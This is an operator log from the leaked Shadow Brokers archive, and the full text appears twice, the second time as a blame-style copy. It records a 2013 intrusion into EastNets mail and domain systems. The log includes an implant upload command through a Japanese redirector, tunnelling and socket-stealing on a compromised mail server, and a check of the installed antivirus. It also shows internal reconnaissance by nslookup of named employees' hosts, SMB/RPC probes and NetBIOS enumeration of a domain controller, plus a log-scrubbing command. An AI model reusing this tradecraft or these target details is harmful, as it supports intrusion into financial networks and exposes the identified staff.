shadowbrokers-exploits/swift/Employee.txt

ISP:	LK
City:	
Phone:	
ISP IP:	186.120.114.169
Source IP:	
FINAL target IP:	
Ops Machine:	LOCALHOST.LOCALDOMAIN
Redirecting Method 1:	PITCHIMPAIR
Redirect Host 1:	210.135.90.41
Redirect Target 1:	192.168.1.3


BEGIN UNIX OPNOTES:

Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
--> 210.135.90.41          cnt1.din.or.jp                 pitchimpair          unix      successful    
---> 192.168.1.3           endxbmail001.eastnets.com      jeepflea_market      windows   successful    
Ops Machine: WO
Results:

PROJECT=JEEPFLEA_MARKET
OPUSER=85521
OPSCHEDULE=13082113184448
SCRUBVER=6.007000008


======================= P0
--- 210.135.90.41 --- cnt1
=======================
ourtn -Y5U /current/up/noserver-x86sol2.8 -wBIN 210.135.90.41
2013-08-29 02:44:00 UTC -- on target
2013-08-29 02:46:02 UTC -- w
Uptime: 106 day(s),  0:15:26
2013-08-29 02:57:51 UTC -- tunnels
-tunnel 
l 110 213.132.40.101 110 38951
-rawsend 666


2013-08-29 04:06:03 UTC -- checking some others
-ping 80.227.254.201
 ICMP Reply (80.227.254.201)   195.906 ms    80.227.254.201 >     210.135.90.41 (TTL  51)  
-ping -r 80.227.254.201 -i -p 48600
 ICMP Reply (80.227.254.201)   1.4294166 s    80.227.254.201 >     210.135.90.41 (TTL  51)  
.... no other open ports


2013-08-29 04:27:35 UTC -- another target 80.227.254.202
-ping -r 80.227.254.202 -t -p 2194
80.227.254.202:2194 -> 210.135.90.41:15563 SYN ACK (port 2194 open)
-ping -r 80.227.254.202 -t -p 2443
80.227.254.202:2443 -> 210.135.90.41:15563 SYN ACK (port 2443 open)


2013-08-29 05:39:46 UTC -- preburn checks
2013-08-29 05:39:54 UTC -- bb


LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130829-0238
###################
SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 13082113184448 -I 85521 -P JEEPFLEA_MARKET -n 200.42.213.11,200.42.213.21 186.120.114.169/240/174
###################
Final lines of bwmonitor.txt:
Thu Aug 29 05:43:04 UTC 2013
eth0        bytes      (MB)    packets     kbps    (kBps)   kbps-1m  kbps-10m   kbps-hr
  TX      3429926     (3.3)      13314      0.0     (0.0)       1.3       0.8       0.9
  RX      4484806     (4.3)      12814      0.0     (0.0)       5.0       1.7       1.5

###################################################
PROJECT: jeepflea_market
DATE: 02:42 AM 08/29/2013
OPUSER: 85521
OPSCHEDULE: 13082113184448
#Op Status: Unsuccessful
#Non-Standard: True
###################################################
Targets:


Results:


======================= T1
---   192.168.1.3   --- endxbmail001
=======================
2:58 AM 8/29/2013 --- trigger sent
3:01 AM 8/29/2013 -- failed with only forward tunnel
3:01 AM 8/29/2013 -- trying with rawsend
3:03 AM 8/29/2013 -- hadouken...  socketsteal w/ 110
Uptime: 95 days, 19:0:10
3:10 AM 8/29/2013 --  Kaspersky Endpoint Security 8.1.0.831
3:17 AM 8/29/2013 -- hour clean
3:20 AM 8/29/2013 -- looking for targs
nslookup endxb-kbaluyot     - 192.168.153.144
nslookup kbaluyot           - 10.10.10.118
nslookup managment          - failed
nslookup endjuy             - failed
nslookup endxb-asanghvi     - failed
nslookup asanghvi           - failed
nslookup juy                - 10.10.10.117
nslookup vmailbox2          - 192.168.2.12
nslookup endxb-msyed        - 10.10.10.74 
nslookup msyed              - failed

3:25 AM 8/29/2013 -- scanning 192.168.153.144
ping - failed
rpc 192.168.153.144 1 445   - failed
3:31 AM 8/29/2013 -- scanning some more targs
ping 10.10.10.117
      REPLY from 10.10.10.117 -> 192.168.1.3 -- TTL: 63
netbios -target 10.10.10.117   - failed
rpc 10.10.10.117 1 445         - failed
ping 10.10.10.1                - failed
ping 10.10.10.118              - failed
ping 192.168.2.12              - failed
ping 10.10.10.74               - failed
ping 80.227.254.243            - failed
4:20 AM 8/29/2013 -- trying some fws
banner -ip 80.227.254.201 -tcp -port 2443     - can't reach network
ping 172.16.104.17             - failed


5:12 AM 8/29/2013 -- seeing if they are in
  REPLY from 10.10.10.118 -> 192.168.1.3 -- TTL: 127
netbios -target 10.10.10.118
---------------------------------------------------------------------
ENDXB-COBAS         UNIQUE REGISTERED        Workstation Service
EASTNETS            GROUP REGISTERED         Domain Name
ENDXB-COBAS         UNIQUE REGISTERED        File Server Service
EASTNETS            GROUP REGISTERED         Browser Service Elections

Adapter Address: 00.26.c6.38.98.30
Adapter Type   : Ethernet Adapter

netbios -target 192.168.153.144   - fail
rpc 10.10.10.118 1 445

5:22 AM 8/29/2013 --  netbios -target 10.10.10.23
ENDXB-CALTAKI       UNIQUE REGISTERED        Workstation Service
EASTNETS            GROUP REGISTERED         Domain Name
ENDXB-CALTAKI       UNIQUE REGISTERED        File Server Service
EASTNETS            GROUP REGISTERED         Browser Service Elections

Adapter Address: 9c.b7.0d.17.7b.e6
Adapter Type   : Ethernet Adapter

5:31 AM 8/29/2013 -- netbios -target 192.168.2.10
---------------------------------------------------------------------
VDC04               UNIQUE REGISTERED        Workstation Service
EASTNETS            GROUP REGISTERED         Domain Name
EASTNETS            GROUP REGISTERED         Domain Controller
VDC04               UNIQUE REGISTERED        File Server Service

Adapter Address: 00.0c.29.8d.e3.3a
Adapter Type   : Ethernet Adapter

5:37 AM 8/29/2013
Inital commit of Shadowbrokers 'Lost in Translation' release 2017-04-14 09:45:07 +00:00			`ISP: LK`
			`City:`
			`Phone:`
			`ISP IP: 186.120.114.169`
			`Source IP:`
			`FINAL target IP:`
			`Ops Machine: LOCALHOST.LOCALDOMAIN`
			`Redirecting Method 1: PITCHIMPAIR`
			`Redirect Host 1: 210.135.90.41`
			`Redirect Target 1: 192.168.1.3`


			`BEGIN UNIX OPNOTES:`

			`Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :`
			`--> 210.135.90.41 cnt1.din.or.jp pitchimpair unix successful`
			`---> 192.168.1.3 endxbmail001.eastnets.com jeepflea_market windows successful`
			`Ops Machine: WO`
			`Results:`

			`PROJECT=JEEPFLEA_MARKET`
			`OPUSER=85521`
			`OPSCHEDULE=13082113184448`
			`SCRUBVER=6.007000008`


			`======================= P0`
			`--- 210.135.90.41 --- cnt1`
			`=======================`
			`ourtn -Y5U /current/up/noserver-x86sol2.8 -wBIN 210.135.90.41`
			`2013-08-29 02:44:00 UTC -- on target`
			`2013-08-29 02:46:02 UTC -- w`
			`Uptime: 106 day(s), 0:15:26`
			`2013-08-29 02:57:51 UTC -- tunnels`
			`-tunnel`
			`l 110 213.132.40.101 110 38951`
			`-rawsend 666`


			`2013-08-29 04:06:03 UTC -- checking some others`
			`-ping 80.227.254.201`
			`ICMP Reply (80.227.254.201) 195.906 ms 80.227.254.201 > 210.135.90.41 (TTL 51)`
			`-ping -r 80.227.254.201 -i -p 48600`
			`ICMP Reply (80.227.254.201) 1.4294166 s 80.227.254.201 > 210.135.90.41 (TTL 51)`
			`.... no other open ports`



			`2013-08-29 04:27:35 UTC -- another target 80.227.254.202`
			`-ping -r 80.227.254.202 -t -p 2194`
			`80.227.254.202:2194 -> 210.135.90.41:15563 SYN ACK (port 2194 open)`
			`-ping -r 80.227.254.202 -t -p 2443`
			`80.227.254.202:2443 -> 210.135.90.41:15563 SYN ACK (port 2443 open)`


			`2013-08-29 05:39:46 UTC -- preburn checks`
			`2013-08-29 05:39:54 UTC -- bb`















			`LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130829-0238`
			`###################`
			`SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:`
			`:`
			`/usr/local/bin/scrubhands -t -S 13082113184448 -I 85521 -P JEEPFLEA_MARKET -n 200.42.213.11,200.42.213.21 186.120.114.169/240/174`
			`###################`
			`Final lines of bwmonitor.txt:`
			`Thu Aug 29 05:43:04 UTC 2013`
			`eth0 bytes (MB) packets kbps (kBps) kbps-1m kbps-10m kbps-hr`
			`TX 3429926 (3.3) 13314 0.0 (0.0) 1.3 0.8 0.9`
			`RX 4484806 (4.3) 12814 0.0 (0.0) 5.0 1.7 1.5`

			`###################################################`
			`PROJECT: jeepflea_market`
			`DATE: 02:42 AM 08/29/2013`
			`OPUSER: 85521`
			`OPSCHEDULE: 13082113184448`
			`#Op Status: Unsuccessful`
			`#Non-Standard: True`
			`###################################################`
			`Targets:`



			`Results:`



			`======================= T1`
			`--- 192.168.1.3 --- endxbmail001`
			`=======================`
			`2:58 AM 8/29/2013 --- trigger sent`
			`3:01 AM 8/29/2013 -- failed with only forward tunnel`
			`3:01 AM 8/29/2013 -- trying with rawsend`
			`3:03 AM 8/29/2013 -- hadouken... socketsteal w/ 110`
			`Uptime: 95 days, 19:0:10`
			`3:10 AM 8/29/2013 -- Kaspersky Endpoint Security 8.1.0.831`
			`3:17 AM 8/29/2013 -- hour clean`
			`3:20 AM 8/29/2013 -- looking for targs`
			`nslookup endxb-kbaluyot - 192.168.153.144`
			`nslookup kbaluyot - 10.10.10.118`
			`nslookup managment - failed`
			`nslookup endjuy - failed`
			`nslookup endxb-asanghvi - failed`
			`nslookup asanghvi - failed`
			`nslookup juy - 10.10.10.117`
			`nslookup vmailbox2 - 192.168.2.12`
			`nslookup endxb-msyed - 10.10.10.74`
			`nslookup msyed - failed`

			`3:25 AM 8/29/2013 -- scanning 192.168.153.144`
			`ping - failed`
			`rpc 192.168.153.144 1 445 - failed`
			`3:31 AM 8/29/2013 -- scanning some more targs`
			`ping 10.10.10.117`
			`REPLY from 10.10.10.117 -> 192.168.1.3 -- TTL: 63`
			`netbios -target 10.10.10.117 - failed`
			`rpc 10.10.10.117 1 445 - failed`
			`ping 10.10.10.1 - failed`
			`ping 10.10.10.118 - failed`
			`ping 192.168.2.12 - failed`
			`ping 10.10.10.74 - failed`
			`ping 80.227.254.243 - failed`
			`4:20 AM 8/29/2013 -- trying some fws`
			`banner -ip 80.227.254.201 -tcp -port 2443 - can't reach network`
			`ping 172.16.104.17 - failed`


			`5:12 AM 8/29/2013 -- seeing if they are in`
			`REPLY from 10.10.10.118 -> 192.168.1.3 -- TTL: 127`
			`netbios -target 10.10.10.118`
			`---------------------------------------------------------------------`
			`ENDXB-COBAS UNIQUE REGISTERED Workstation Service`
			`EASTNETS GROUP REGISTERED Domain Name`
			`ENDXB-COBAS UNIQUE REGISTERED File Server Service`
			`EASTNETS GROUP REGISTERED Browser Service Elections`

			`Adapter Address: 00.26.c6.38.98.30`
			`Adapter Type : Ethernet Adapter`

			`netbios -target 192.168.153.144 - fail`
			`rpc 10.10.10.118 1 445`

			`5:22 AM 8/29/2013 -- netbios -target 10.10.10.23`
			`ENDXB-CALTAKI UNIQUE REGISTERED Workstation Service`
			`EASTNETS GROUP REGISTERED Domain Name`
			`ENDXB-CALTAKI UNIQUE REGISTERED File Server Service`
			`EASTNETS GROUP REGISTERED Browser Service Elections`

			`Adapter Address: 9c.b7.0d.17.7b.e6`
			`Adapter Type : Ethernet Adapter`

			`5:31 AM 8/29/2013 -- netbios -target 192.168.2.10`
			`---------------------------------------------------------------------`
			`VDC04 UNIQUE REGISTERED Workstation Service`
			`EASTNETS GROUP REGISTERED Domain Name`
			`EASTNETS GROUP REGISTERED Domain Controller`
			`VDC04 UNIQUE REGISTERED File Server Service`

			`Adapter Address: 00.0c.29.8d.e3.3a`
			`Adapter Type : Ethernet Adapter`

			`5:37 AM 8/29/2013`